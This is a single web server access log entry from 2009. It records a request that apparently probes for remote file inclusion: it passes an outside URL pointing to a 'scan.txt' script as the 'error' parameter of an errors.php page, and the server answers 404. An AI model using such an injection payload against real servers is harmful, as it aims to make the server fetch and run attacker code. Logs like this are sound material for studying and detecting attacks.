119.205.209.69 - - [06/Jan/2009:09:38:26 -0800] "GET /logs/access_080828.log/errors.php?error=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
